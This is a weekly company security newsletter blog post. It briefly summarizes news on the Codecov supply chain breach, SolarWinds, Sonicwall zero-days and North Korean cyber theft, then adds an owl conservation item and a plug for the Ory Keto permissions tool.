Hello and welcome to TSD, your weekly blog post with top of mind security issues. TSD began as an internal newsletter that our Security Lead, Daniel Tobin, would circulate to the team each Tuesday. It proved to be a great resource for all of us so we thought, why not share it with all of you? Our hope is that it helps make you just a bit more secure.
Check back here every Tuesday for more TSD or sign up below to stay in the loop!
- A supply chain attack has hit Codecov according to the company. ArsTechnica digs into the attack which uploaded secrets from build environments. Federal investigators have started looking into the breach according to Reuters.
- A partner in Microsoft’s advanced vulnerability program MAPP was removed after it was linked to sharing information with Russia according to Kim Zetter. MAPP has come under scrutiny after the massive Exchange hack.
- The New Yorker has a deep dive into North Korea’s “cyber forces have raked in billions of dollars for the regime by pulling off schemes ranging from A.T.M. heists to cryptocurrency thefts.”
- Sonicwall published fixes for 3 zero days that were actively being exploited.
- NPR has a 12 minute listen to The Untold Story of the Solarwinds Hack. The US meanwhile set out sanctions against Russia for the Solarwinds hack and election meddling. KrebsOnSecurity also has a scoop that maybe someone in the Commerce Department found it in August 2020.
Owl fun and facts:
“There are only three known northern spotted owls left in the wild in Canada, including just one breeding pair. Their chicks have on occasion been taken for a captive breeding program, to try and boost the species’ prospects.”
“Now Canada and British Columbia have announced a more full-throated response to the potential extinction of the owl within the country’s borders. In tandem with the breeding scheme, the province will enforce a one-year halt to logging in the few remaining old-growth forests that the owl favors, until more permanent protections can be instituted.”
Read more at The Guardian
A Shout Out:
Ory Keto is an open source project policy as code solution for checking permissions.
“If you need to know if a user (or robot, car, service) is allowed to do something – Ory Keto is the right fit for you.”
“Currently, Ory Keto implements the basic API contracts for managing and checking relations (“permissions”) with HTTP and gRPC APIs.”
That’s owl for now!